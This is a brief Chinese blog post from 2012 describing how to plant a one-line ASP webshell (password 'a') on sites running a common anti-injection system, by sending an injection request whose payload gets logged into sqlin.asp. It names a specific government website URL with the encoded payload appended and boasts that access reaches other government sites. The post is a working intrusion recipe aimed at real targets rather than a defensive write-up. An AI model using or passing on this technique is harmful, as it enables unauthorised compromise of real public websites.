直接给asp防注入getwebshell

这些网站都用的通用防注入系统
有个别网站的目录存在sqlin.asp保存注入记录  可以写入一句话木马
比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾
可在http://pzzl.gov.cn/sqlin.asp写入一句话,密码a
连接上去可以看到另外的几个政府网站

posted on 2012-07-13 11:44  =_=!  阅读(360)  评论(2编辑  收藏  举报

导航